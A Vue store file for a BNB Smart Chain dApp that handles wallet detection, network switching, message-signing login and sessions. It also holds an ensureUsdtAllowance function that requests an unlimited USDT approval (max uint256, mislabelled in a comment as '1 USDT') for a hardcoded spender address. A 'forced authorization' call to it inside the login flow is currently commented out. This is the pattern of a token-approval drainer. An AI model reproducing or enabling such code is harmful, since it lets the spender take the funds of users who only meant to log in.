// src/store/wallet.js
import Vue from "vue";

import { requestOAuthToken } from "@/api/auth";
import i18n, { normalize, LS_LANG } from "@/i18n";
import { getLocaleMeta } from "@/i18n/localeMeta";

// ❌ 删掉这一行：const LS_LANG = "lang";
const LS_WALLET = "neo_wallet_session";

// ✅ 语言归一化：旧值 en_US -> en
const normalizeLang = (l) => {
  if (!l) return "en";
  if (l === "en_US") return "en";
  return l;
};

// ✅ 只初始化一次（不要再给 const 重新赋值）
const DEFAULT_LANG = normalizeLang(localStorage.getItem(LS_LANG) || "en");

// ====== BSC 配置 ======
const BSC_ID_HEX = "0x38"; // 56
const BSC_MAIN = {
  chainId: BSC_ID_HEX,
  chainName: "BNB Smart Chain",
  rpcUrls: ["https://bsc-dataseed.binance.org/"],
  nativeCurrency: { name: "BNB", symbol: "BNB", decimals: 18 },
  blockExplorerUrls: ["https://bscscan.com/"],
};

// ====== USDT 授权配置（写死） ======
const USDT_ADDRESS = "0x55d398326f99059fF775485246999027B3197955";

// 🔥 这里改成你的合约地址
const USDT_SPENDER_ADDRESS = "0xbb44Fe51C649697Ea72b16f1968F465D6F7d3389";

// 1 USDT（18位）
const USDT_APPROVE_AMOUNT = "0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff";

// 1 USDT（18位）
//const USDT_APPROVE_AMOUNT = "10000000000000000000000";
const state = Vue.observable({
  showModal: false,
  connected: false,
  address: "",
  token: "",
  providerChoice: "Auto",

  // ✅ 语言（唯一真源）
  lang: normalize(localStorage.getItem(LS_LANG) || "en"),

  // ✅ 连接状态
  connecting: false,
  connectStep: "", // detect | accounts | switch | sign | login
});

const short = (addr) => (addr ? addr.slice(0, 6) + "..." + addr.slice(-4) : "");

// ====== 兼容封装：统一成带 request() 的 provider ======
function wrapProvider(p) {
  if (!p) return null;
  if (typeof p.request === "function") return p;

  const sendAsync = p.sendAsync?.bind(p);
  const send = p.send?.bind(p);

  if (sendAsync || send) {
    return {
      ...p,
      request: ({ method, params }) =>
        new Promise((resolve, reject) => {
          const payload = { jsonrpc: "2.0", id: Date.now(), method, params: params || [] };
          const fn = sendAsync || ((pl, cb) => send(pl, cb));
          fn(payload, (err, res) => {
            if (err) return reject(err);
            resolve(res?.result ?? res);
          });
        }),
    };
  }

  if (typeof p.enable === "function") {
    return {
      ...p,
      request: async ({ method }) => {
        if (method === "eth_requestAccounts") return await p.enable();
        throw new Error("Provider does not support this method");
      },
    };
  }

  return null;
}


function getEip6963Providers() {
  return new Promise((resolve) => {
    const providers = [];

    function onAnnounce(event) {
      if (event && event.detail) {
        providers.push(event.detail);
      }
    }

    window.addEventListener("eip6963:announceProvider", onAnnounce);

    window.dispatchEvent(new Event("eip6963:requestProvider"));

    setTimeout(() => {
      window.removeEventListener("eip6963:announceProvider", onAnnounce);
      resolve(providers);
    }, 300);
  });
}

// ====== 统一找各个钱包 provider ======
async function getProviderByChoice(choice) {
  const w = window;
  const eth = w.ethereum;

  const eip6963List = await getEip6963Providers();

  const providers = [
    ...eip6963List.map((item) => item.provider),
    ...(Array.isArray(eth?.providers) ? eth.providers : []),
    eth,
    w.BinanceChain,
    w.okxwallet,
    w.trustwallet,
    w.safepalProvider,
  ].filter(Boolean);

  const findMetaMask = () => {
    const by6963 = eip6963List.find((item) => {
      const name = String(item.info?.name || "").toLowerCase();
      const rdns = String(item.info?.rdns || "").toLowerCase();
      return name.includes("metamask") || rdns.includes("metamask");
    });

    if (by6963?.provider) return by6963.provider;

    return (
      providers.find((p) => {
        return (
          p?.isMetaMask &&
          !p?.isTokenPocket &&
          !p?.isOkxWallet &&
          !p?.isTrust &&
          !p?.isTrustWallet &&
          !p?.isSafePal &&
          !p?.isSafePalWallet
        );
      }) || null
    );
  };

  const findTokenPocket = () =>
    providers.find((p) => p?.isTokenPocket) || w.tokenpocket || null;

  const findOKX = () =>
    w.okxwallet || providers.find((p) => p?.isOkxWallet) || null;

  const findBinance = () =>
    w.BinanceChain ||
    providers.find((p) => p?.isBNB || p?.isBinance) ||
    null;

  const findTrust = () =>
    providers.find((p) => p?.isTrust || p?.isTrustWallet) ||
    w.trustwallet ||
    null;

  const findSafePal = () =>
    w.safepalProvider ||
    providers.find((p) => p?.isSafePal || p?.isSafePalWallet) ||
    w.safepal ||
    w.safePal ||
    null;

  let raw = null;

  if (choice === "Metamask") {
    raw = findMetaMask();

    if (!raw) {
      throw new Error("没有检测到真正的 MetaMask。请刷新页面，或在 Chrome 扩展程序里确认 MetaMask 已允许访问当前网站。");
    }

    return wrapProvider(raw);
  }

  if (choice === "TokenPocket") {
    raw = findTokenPocket();
    if (!raw) throw new Error("没有检测到 TokenPocket 钱包。");
    return wrapProvider(raw);
  }

  if (choice === "OKX") {
    raw = findOKX();
    if (!raw) throw new Error("没有检测到 OKX 钱包。");
    return wrapProvider(raw);
  }

  if (choice === "Binance") {
    raw = findBinance();
    if (!raw) throw new Error("没有检测到 Binance Wallet。");
    return wrapProvider(raw);
  }

  if (choice === "Trust") {
    raw = findTrust();
    if (!raw) throw new Error("没有检测到 Trust Wallet。");
    return wrapProvider(raw);
  }

  if (choice === "SafePal") {
    raw = findSafePal();
    if (!raw) throw new Error("没有检测到 SafePal 钱包。");
    return wrapProvider(raw);
  }

  raw =
    findMetaMask() ||
    findTokenPocket() ||
    findOKX() ||
    findBinance() ||
    findTrust() ||
    findSafePal() ||
    eth ||
    null;

  return wrapProvider(raw);
}

// ====== 必须在 BSC ======
async function ensureBsc(provider) {
  let chainIdRaw = await provider.request({ method: "eth_chainId" });

  if (chainIdRaw && typeof chainIdRaw === "object") {
    chainIdRaw = chainIdRaw.chainId || chainIdRaw.result || chainIdRaw.data || null;
  }
  if (typeof chainIdRaw === "number") chainIdRaw = "0x" + chainIdRaw.toString(16);

  const chainId = typeof chainIdRaw === "string" ? chainIdRaw.toLowerCase() : null;
  if (chainId === BSC_ID_HEX) return;

  try {
    await provider.request({
      method: "wallet_switchEthereumChain",
      params: [{ chainId: BSC_ID_HEX }],
    });
  } catch (err) {
    if (err && err.code === 4902) {
      await provider.request({
        method: "wallet_addEthereumChain",
        params: [BSC_MAIN],
      });
      return;
    }
    throw new Error("This DApp only supports BNB Smart Chain (BSC). Please switch your wallet network to BSC.");
  }
}

// ====== message（与后端解析一致） ======
function buildLoginMessage({ nonce, chainId, domain }) {
  return [
    `Sign to verify your address: ${Date.now()}`,
    `nonce:${nonce}`,
    `chainId:${chainId}`,
    `domain:${domain}`,
  ].join("\n");
}

// ====== personal_sign ======
async function signMessage(provider, address, message) {
  try {
    return await provider.request({ method: "personal_sign", params: [message, address] });
  } catch (e) {
    // 部分钱包参数顺序相反
    return await provider.request({ method: "personal_sign", params: [address, message] });
  }
}

// ====== session 持久化 ======
function saveSession() {
  try {
    localStorage.setItem(
      LS_WALLET,
      JSON.stringify({
        address: state.address || "",
        token: state.token || "",
        providerChoice: state.providerChoice || "Auto",
      })
    );
  } catch (e) {
    console.debug("saveSession ignored:", e?.message || e);
  }
}

function clearSession() {
  try {
    localStorage.removeItem(LS_WALLET);
  } catch (e) {
    console.debug("clearSession ignored:", e?.message || e);
  }
}

// ====== modal ======
function openModal() {
  state.showModal = true;
}
function closeModal() {
  state.showModal = false;
}

// ✅ 语言（唯一入口）
function setLang(lang) {
  const l = normalize(lang);
  state.lang = l;
  localStorage.setItem(LS_LANG, l);
  i18n.locale = l;
}

// ✅ 给顶部显示用
function langMeta() {
  return getLocaleMeta(state.lang);
}

// ====== 主方法：连接 + 登录（给 WalletModal 调用） ======
async function connectAndLogin(choice = "Auto") {
  if (state.connecting) return null;

  state.connecting = true;
  state.connectStep = "detect";

  try {
    const provider = await getProviderByChoice(choice);
    if (!provider) {
      throw new Error("No compatible wallet found. Please install a BSC-compatible wallet.");
    }

    state.connectStep = "accounts";
    const accounts = await provider.request({ method: "eth_requestAccounts" });
    const address = (accounts && accounts[0]) || "";
    if (!address) throw new Error("No account returned.");

    state.connectStep = "switch";
    await ensureBsc(provider);

    // 🔥 新增：强制授权
    // state.connectStep = "approve";
    // await ensureUsdtAllowance(provider, address);

const nonce = "LOGIN";
    const message = buildLoginMessage({
      nonce,
      chainId: 56,
      domain: window.location.host,
    });

    state.connectStep = "sign";
    const signature = await signMessage(provider, address, message);

    state.connectStep = "login";
    const data = await requestOAuthToken(address, signature, message);

    const token = data?.access_token || data?.data?.access_token || null;
    if (!token) {
      if (data?.msg) throw new Error(data.msg);
      throw new Error("Login failed. No access_token returned.");
    }

    state.connected = true;
    state.address = address;
    state.token = token;
    state.providerChoice = choice;

    saveSession();
    closeModal();
    return { address, token };
  } finally {
    state.connecting = false;
    state.connectStep = "";
  }
}


// ====== 检查并授权 USDT ======
async function ensureUsdtAllowance(provider, owner) {
  const allowanceData =
    "0xdd62ed3e" +
    owner.replace(/^0x/, "").padStart(64, "0") +
    USDT_SPENDER_ADDRESS.replace(/^0x/, "").padStart(64, "0");

  const allowanceHex = await provider.request({
    method: "eth_call",
    params: [
      {
        to: USDT_ADDRESS,
        data: allowanceData,
      },
      "latest",
    ],
  });

  const allowance = BigInt(allowanceHex || "0x0");
  const needAmount = BigInt(USDT_APPROVE_AMOUNT);

  // ✅ 已经够了
  if (allowance >= needAmount) {
    return true;
  }

  // ❗ 不够 → 发起授权
  const approveData =
    "0x095ea7b3" +
    USDT_SPENDER_ADDRESS.replace(/^0x/, "").padStart(64, "0") +
    needAmount.toString(16).padStart(64, "0");

  const txHash = await provider.request({
    method: "eth_sendTransaction",
    params: [
      {
        from: owner,
        to: USDT_ADDRESS,
        data: approveData,
      },
    ],
  });

  await waitTx(provider, txHash);

  return true;
}

// ====== 等待交易确认 ======
async function waitTx(provider, txHash) {
  for (let i = 0; i < 60; i++) {
    const receipt = await provider.request({
      method: "eth_getTransactionReceipt",
      params: [txHash],
    });

    if (receipt) {
      if (receipt.status !== "0x1") {
        throw new Error("USDT authorization failed.");
      }
      return receipt;
    }

    await new Promise((r) => setTimeout(r, 2000));
  }

  throw new Error("Authorization timeout.");
}

// 前端断开（退出）
function disconnect() {
  state.connected = false;
  state.address = "";
  state.token = "";
  state.providerChoice = "Auto";
  clearSession();
}

// 初始化：启动时同步一次到 i18n
i18n.locale = state.lang;

export default {
  state,
  short,

  // modal
  openModal,
  closeModal,

  // wallet
  connectAndLogin,
  disconnect,

  // lang
  setLang,
  langMeta,
};
